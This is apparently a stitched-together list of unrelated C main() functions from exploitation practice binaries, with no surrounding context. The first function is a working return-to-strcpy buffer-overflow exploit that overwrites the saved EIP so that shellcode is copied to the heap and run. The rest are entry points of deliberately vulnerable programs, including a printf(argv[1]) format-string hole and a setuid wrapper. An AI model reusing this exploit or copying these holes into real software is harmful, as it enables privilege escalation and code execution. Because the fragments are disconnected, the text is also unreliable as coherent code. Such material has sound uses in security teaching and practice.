main() { char buf[512]; char *p; void *strcpy_ptr; void *heap_base; signal(SIGTRAP, trap_handler); strcpy_ptr = (void*) &strcpy; printf("[+] strcpy is at %p\n", (unsigned long)strcpy_ptr); heap_base = (void*) malloc(getpagesize()); printf("[+] heap base is at %p\n", (unsigned long)heap_base); memset(buf, 0x00, sizeof(buf)); memset(buf, 0x41, 256); p = buf + 256; *((unsigned long*)p) = 0x42424242; /* EBP */ p += 4; *((unsigned long*)p) = (unsigned long) strcpy_ptr; /* EIP */ p += 4; *((unsigned long*)p) = (unsigned long) heap_base; /* RET */ p += 4; *((unsigned long*)p) = (unsigned long) heap_base; /* ARG1 */ p += 4; *((unsigned long*)p) = (unsigned long) &asmcode; /* ARG2 */ vuln(buf); printf("[-] Failed\n"); exit(EXIT_FAILURE); }
int main(int argc, char** argv) { if(argc != 2) { printf("Need more arguments!\n"); return 1; } printf("OK\n"); vuln(argv[1]); return 0; }
int main(int argc, char **argv){ int *ptr = &key; printf(argv[1]); if (key > 9000){ vuln(); } return 0; }
int main() { puts("I LIKE TO SEASHELLS"); puts("==================="); vuln(); return 0; }
int main(int argc, char **argv) { if (argc != 2) { printf("Usage: stack_overwrite [str]\n"); return 1; } uid_t euid = geteuid(); setresuid(euid, euid, euid); vuln(0, argv[1]); return 0; }
int main(int argc, char **argv) { if (argc != 2) { printf("Usage: overflow1 [str]\n"); return 1; } vuln(argv[1]); return 0; }
int main(int argc, char **argv) { if (argc != 2) { printf("Usage: art_of_the_shell [str]\n"); return 1; } be_nice_to_people(); vuln(argv[1]); return 0; }
int main( int argc, char *argv[] ) { if (argc < 2){ printf("\n\tUsage %s <password> [-d]\n\n", argv[0]); return -1; } else if (argc == 3){ deb = 1; printf("\n[+] Address of function \"secret\":\t%p\n", secret); } vuln(argv[1]); return 0; }
int main(int argc, char *argv[]) { printf("Try to exec /bin/sh"); vuln(); return 0; }
int main(int argc, char **argv){ be_nice_to_people(); if(argc > 1) vuln(argv[1]); return 0; }
int main (int argc, char **argv) { vuln (); }
int main(int argc, char **argv) { printf("Val: %s\n", argv[1]); vuln(argv[1]); return 0; }
int main(int argc, char **argv) { vuln(argv[1]); }
int main(void) { vuln(); return 0; }
int main(int argc, char* argv[]) { vuln(); printf("Sorry, try again."); return 0; }
int main(int argc, char **argv) { vuln(argv[1]); return 1; }
int main(int argc, char* argv[]) { vuln(); return 0; }
void main(int argc, void **argv) { if(argc > 1) vuln(argv[1]); }
int main() { vuln(); }